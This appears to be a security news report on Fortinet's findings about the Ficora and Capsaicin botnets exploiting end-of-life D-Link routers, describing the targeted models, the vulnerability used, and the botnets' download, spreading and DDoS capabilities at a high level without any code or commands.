Two botnets, tracked as “Ficora” and “Capsaicin,” have been observed ramping up attacks on outdated and end-of-life D-Link routers, according to Fortinet’s researchers.
Among the targeted models are popular D-Link routers widely used by both individuals and organizations, including DIR-645, DIR-806, GO-RT-AC750, DIR-845L. For initial access the attackers exploit known vulnerabilities such as CVE-2015-2051.
Once compromised, the botnets take advantage of flaws in D-Link’s management interface, specifically through the HNAP (Home Network Administration Protocol), to execute malicious commands via the GetDeviceSettings action.
Both botnets are capable of stealing data, executing shell scripts, launching distributed denial-of-service (DDoS) attacks.
Ficora, appears to be a new variant of the notorious Mirai botnet, which has been optimized to exploit vulnerabilities specific to D-Link routers. Fortinet’s telemetry data shows that Ficora’s activity spreads across the globe, with notable focus on Japan and the United States. Two activity surges were recorded in October and November 2024.
After gaining access, Ficora deploys a shell script named ‘multi,’ which downloads and executes its payload using multiple methods such as wget, curl, ftpget, and tftp. The malware also includes a brute force component with hard-coded credentials, enabling it to spread to other Linux-based devices. Ficora’s DDoS capabilities include UDP flooding, TCP flooding, DNS amplification.
Capsaicin, linked to the Keksec group known for malware like EnemyBot has been first spotted in October 2024 targeting primarily East Asian countries. The botnet uses a downloader script (“bins.sh”) to fetch binaries with the prefix ‘yakuza’ for various architectures, including ARM, MIPS, SPARC, and x86.
Capsaicin is capable of disabling other botnet payloads active on the same device. In addition to DDoS capabilities similar to Ficora’s, Capsaicin can gather host information and exfiltrate it to its command-and-control (C2) server.